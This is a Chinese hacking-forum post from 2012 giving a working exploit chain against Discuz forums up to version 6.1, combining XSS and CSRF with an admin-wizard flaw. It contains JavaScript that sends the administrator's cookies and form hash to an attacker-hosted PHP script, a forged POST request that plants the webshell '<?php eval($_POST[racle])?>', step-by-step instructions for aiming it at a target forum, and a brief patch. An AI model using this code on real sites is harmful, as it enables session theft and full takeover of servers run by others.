找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3672|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Discuz XSS得webshell; `0 a7 C/ v, i  ]3 t
By racle @tian6.com2 F* C' R5 M' @* J
欢迎转帖.但请保留版权信息.. [7 Z4 [) B5 @* W2 w
受影响版本iscuz<=6.1.0,gbk+utf+big5  |1 {4 k! `0 B# a# q* F0 T

* N) U; x. q6 O- K+ c新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.' E" H( i. X* U7 f/ G1 Q

0 u3 n* t1 v$ w; O5 u: i+ @3 ^& Y3 [7 K9 D1 x& z1 V
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
% E' H7 g4 z" ]$ r0 Q2 t7 ~7 f当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.! s. s# w, b, E
$ y- C% U4 j" y7 {
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
: [( a& X" O* w# E0 k  G- W+ T2 I本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
( f; J/ t1 `" _0 W2 G6 Y( Z8 |  G1 r( ?% v- {% l& w; w
" L/ x0 D" U1 q# V, j) q' A+ _
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
) A4 h5 o6 }# f. v, h/ O
7 }7 J5 z4 H# ]' J* p  H- F6 x9 m9 R  P
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.) v) R/ N, c$ P( G
. G# |! s" ^$ L+ E) x5 f6 h
problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer., `( f2 e4 p- \% e

" x& u+ K5 B; n/ P; Aproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.6 \2 T; g4 o) t

& a% R+ X. o+ I0 O/ `
5 u* r  e' ^1 l) g+ k" o下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
7 c5 z% M8 J) ~4 W( [8 Z2 P& V/ T- X. m) C& w( P
        global $runwizardfile, $runwizardhistory;
! j1 A& J8 |' O. Q
; H; [# H7 F8 B5 \7 d3 f        $fp = fopen($runwizardfile, 'w');
) ~+ }3 y& G! C, r% {  |+ J
& d: u3 ]5 p1 x& Q) ~0 B0 A4 A/ B        fwrite($fp, serialize($runwizardhistory));' p+ ~3 `! z# T, ]

' Q' b& F( n6 w, c0 M        fclose($fp);
. L4 k! P8 w: ~& Y  t' ^
: f, t) [. w! T" h/ T2 u" V- G}
+ U; ?+ y5 s$ R! q) u' L复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.# X5 u2 T2 q! ^2 D+ L
以下是修补的办法:function saverunwizardhistory() {, l4 @" q& h: K4 d

; w! F! W; B: V8 |8 B6 P! W8 s" k/ o+ u        global $runwizardfile, $runwizardhistory;
5 W6 m3 P* l9 y. [+ X8 @
9 E) `" C( |  X$ i5 L        $fp = fopen($runwizardfile, 'w');
8 O8 x7 F9 c& p" N# M" _% ^
2 [9 Y3 }! K  x+ w- ^. I        $s = '<?php exit;?>';
  v% ]9 A9 k5 K% \2 g+ j' S2 {, A9 J7 v7 R! h* t  ~  \5 N$ }
        $s .= serialize($runwizardhistory);/ Z$ g$ M" }. [  z
* }, |  ?7 l, x" C
        fwrite($fp, $s);* L9 N+ j, E7 N& O% D
+ H  V; |/ t  n9 q( [! q* p
        fclose($fp);
" x. i) e3 l$ d+ @" y# o1 e* E, R; @/ [& h: ]
}
' ?5 J6 \% `6 B, r+ l复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
' _9 y+ W) l, \
) U* Y* F. S4 j, B- h$ u% u' i$ M" t. q6 W

: ]) j# C9 G2 P! X+ A# l' U. T----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
3 |+ @! N; E& O; j! }9 j9 M$ n- O0 p+ W

# M! E" r) V8 n4 ~5 ^  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
; B# Y8 I3 W$ l0 q
7 O  f' r0 A6 O6 u5 Z. C我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
  y2 k+ m- z! X$ p1 g* f) F" {/ X# T
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
$ V4 p) A+ O! n" M/ G2 r1 s8 z' c% [% Y0 ^( a8 \) Y- {
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
, J5 D: g+ Z! H, k* n. O% R5 c5 {  |# G2 q% g5 D4 C: f
var url="http://目标网站/admincp.php";      
' A4 L, ~# @4 w/ f: D, b) {. I
  E" @7 b2 J7 H4 l+ {/*获得cookies*/. X: j3 a+ f; m; Z1 S

/ d5 H- g2 o( F, Pfunction getURL(s) {# d( `: l. N/ I/ B

1 v+ R6 D# N# c, I, G: Zvar image = new Image();
4 d* q. X" G: H$ f$ a
# W5 L6 V8 r6 a, v$ Y/ t" `image.style.width = 0;9 y5 d* G5 I9 H' h5 m

( C) i0 I$ y3 B& f% k& bimage.style.height = 0;
& F1 ~* p2 b7 p% `) R
+ D% j, I# R' X7 [6 W/ n! Rimage.src = s;
7 m! e6 r" q8 D- F7 B" j* c8 M. p+ S7 j4 W: K- a7 ]
}
+ Q2 b7 r  t/ j2 j6 V! g. k
; r: g/ K: A  X+ l$ vgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
) E6 S5 C7 g* w复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
; x+ c- t2 q, P" q( H9 }复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)
2 w, Y( q+ ?$ |6 x' m
0 d& ~: k+ A* o1 V* @2 ?$ \' k* i5 u. s7 J4 e# k
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
' l% k5 \; J2 u7 e: r: I$ v' C. c. L* H( v% d7 ^1 o/ t
) B& b; d* V6 ^

4 v8 i2 K( g: X& F; l/*hash*/
" G/ w9 E( _- d: S0 E$ f. Y  I
! `/ m$ o# T& e  @; t$ k" _var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");3 c7 d& _! w% K, }
9 o0 R* t& w* n9 Z8 c4 m1 L+ O
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);, z) V8 x) j  |. |! p# X/ \

) I1 v/ `2 l/ I4 ~! G- m' qxmlHttpReq.send();
# c2 w& f6 E- J2 w5 {
+ u$ r6 F: L9 f2 b1 Cvar resource = xmlHttpReq.responseText;
' v1 E( b3 U2 a1 G! i# F1 M# G, d5 U
var numero = resource.search(/formhash/);. o. I6 ^6 p( U$ G: Y9 L

7 \7 E) ^9 [5 Yvar formhash=encodeURIComponent(resource.substr(numero+17,8));
7 d4 e) n, ], d: `+ K* L) Z+ R' x* \4 L! C3 B2 D5 Q$ Z* V

: M6 U2 @$ ~5 z: E$ E7 y
  V1 t0 |, B4 r5 i9 pvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
& D7 c2 M1 k  c$ V6 C$ p0 A, [7 t8 i9 c) g/ B
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
3 E& z, Y+ V' v
% f# n$ x; o/ Q* r0 nxmlHttpReq.setRequestHeader("Referer", url);
/ O7 V2 T4 C* r2 l7 t& a: ]# @$ @0 A: X$ H: |
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");) |. x5 h4 q1 n2 W- p
2 V/ g; x3 F, c5 h
xmlHttpReq.setrequestheader("content-length",post.length); % [* Z9 B+ O& k" {

  u+ X- z" H8 M9 txmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
. @  ?0 C+ d# t0 J# z" V) ~* Q. j, o' I3 V4 ?
xmlHttpReq.send(post);//发送数据
- p  y; ^+ F( E7 t- @0 ?复制代码这里HASH我假设正确,这样提交,也无须cookies/ U* d, O+ i# q4 \  d- h: H4 D

7 E  n# J$ |) b再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
+ K; k. h8 o9 P' I3 d! n$ ?1 I& H( K- x, m2 x& x; ~& e
if (!$sock) die("$errstr ($errno)\n");
/ o  S1 q( d8 S6 K$ k6 p) a% ?# _" g: h6 ~
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';% {& i8 g5 o3 [* c

. A8 Y: L5 B. v& }$ I, |  J4 a5 B/ A( o0 r& W$ O4 a2 H

+ I! M3 M) M- q* k% Z$ \fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");) h- d# n4 v" S3 s' M
0 I+ c. v6 m4 b( g
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
) R+ W0 ?+ I' l+ G
+ v- W  q) G, E" g+ W1 Mfwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");8 Q- i. h2 P( a. H9 i: H
4 U! t: L" A2 v; ~3 p; v
fwrite($sock, "Accept-Language: zh-cn\r\n");8 P' K5 g7 _# Q, J7 S0 t

7 r) a0 q6 j1 R5 ]/ Afwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");  M9 q' f' M# A7 v3 B; N* F
# Z5 a; {0 K8 s* w! ?
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
& ]9 t) j4 c, ]3 N
+ {8 `, u" U/ M' J, u& r/ m0 }fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
% y1 O' B8 m. l' k( u1 k! D9 s6 e# G$ ?/ o7 d
fwrite($sock, "Host: $url\r\n");" x* ?' ?" ^7 W6 N# t% y
5 X) F, Z- N/ m) G' M
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");# Z% F. Z* Y( F5 o

* B8 I2 C  j8 F2 tfwrite($sock, "Connection: Keep-Alive\r\n");: q+ Y& h; f# d- w

$ x- [3 w) o3 W( T7 nfwrite($sock, "Cache-Control: no-cache\r\n");9 N6 S5 ]9 f1 d  M

; C5 l" a9 g* C! I3 c+ q# Afwrite($sock, "Cookie:".$cookies."\r\n\r\n");
) }; i4 s$ @/ Q8 k2 a/ s( h! r+ j' K
fwrite($sock, $data);
' l) S$ n8 c& W7 L! t
& G0 G2 ^' k2 c2 u1 d! l- P! k; U1 k7 A" e% |' U

: S6 ]( C  q8 E1 p$ t* M$headers = "";( Z: x; z; G, k9 `! J# m
7 P1 L/ s4 L9 j( ]
while ($str = trim(fgets($sock, 4096)))8 ]! Z, z: A. D

* p2 s7 i: i5 j; n6 {     $headers .= "$str\n";& G8 U4 ?% Q: e' H
3 X* ^3 A  u5 G& Z
echo "\n";" Y( x3 q1 ^* w2 Q

! d8 b* d6 R# [( A8 q* y$body = "";) n3 s+ _9 n) B0 U* s( C; ?

6 ~1 ~% _4 _4 Rwhile (!feof($sock))4 I4 r7 A, k, g, P" E1 G# w# p

+ y, k! O( f8 u/ L, I+ j     $body .= fgets($sock, 4096);
9 o! g5 l9 v0 y" [4 |, w4 {
5 z4 O2 E% m6 t- c" efclose($sock);
8 u3 y" A: H0 {+ Y$ M+ C3 v) Q1 t# E/ `/ s, p+ b: k0 I; E
echo $body;
2 N- c9 H; F! l# I; d2 l复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^8 }4 V1 C# v7 I0 u$ x3 Q8 f$ E
* k& a% q9 x1 w: L9 p

/ O) @. \% B5 ^& J+ V6 S-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
, p: h0 s& X+ ]- `- \+ v& s
, E/ j, B% r1 h; \! Q  w, g  k. ?  Z( M# H! c- s
1HP SOCKET利用方法首先打开racle.js
$ V+ ]5 f# N8 v5 }8 V0 {4 N, Q5 I0 q/ A( V4 `' H4 Z" `  h
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
- K( F8 K6 o- E& R7 j2 K+ e8 A# e, [  F4 z5 I; o. `  Z; @0 P$ R9 j
- ?$ ~8 r5 w  A* F5 q- v5 `4 ^5 Y( E
+ o1 v' |$ Q  d$ Q/ {! u7 }
然后打开racle@tian6.php
8 N# p. h$ G- N4 O
9 L4 j% d& E& s  g$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com: ]' H* q- w0 W9 u. Q# S" s& ~8 m8 M

5 b. n: H; J$ v: g' n, f4 u& R* ]( W

+ D7 k, N6 D0 w/ t9 j5 V6 I. n如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:9 \4 F5 C  g  J7 |5 G

/ I3 @6 a/ W3 N$ r1 L& U$ r3 `% VgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
9 \  C, y' p5 O' Y7 o6 C
, y6 B* O+ A7 ~, ?- f  V- L0 ~8 V' P" D
4 u# m+ @# I* r
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
: \1 S& L2 L) E4 |$ b4 _. n复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
. O- u; q2 ]# M2 B2 r7 u# R) m( I4 m
( m6 |/ [" G! h4 O8 Q& }
, R% }9 z( x* J# ]$ W" H- L! O, u( J' ^) i; Y/ E
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:2 k3 m4 p& n: p' |0 W) f

  i  ]- `) Q4 e  U3 y3 Ivar formhash=encodeURIComponent(resource.substr(numero+17,8));1 B! B6 a3 D0 _7 n4 ^

0 ~) ~1 h- S& V" N& E5 L+ F' C# y% {! |/ _
% o9 t0 y  N% X% [8 ^0 f2 b% ]
var formhash=encodeURIComponent(resource.substr(numero+9,8));$ e3 F- Q5 j. c! h5 P" F& o' ?3 U
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.! ^+ N, ?0 R0 G! w% x6 A
4 s1 B4 U& N8 a+ T7 X* X
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.9 M) |( P8 w. b$ M$ F, t0 Y8 H
" ~; u% O2 J3 V3 l) s! h
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.7 u( s- ]* f' p) Y# N
+ C8 p/ [1 T0 n
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
) W4 a5 v9 G5 R4 U9 t# r8 Y
  |- {9 s: }+ N0 P) b. T
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表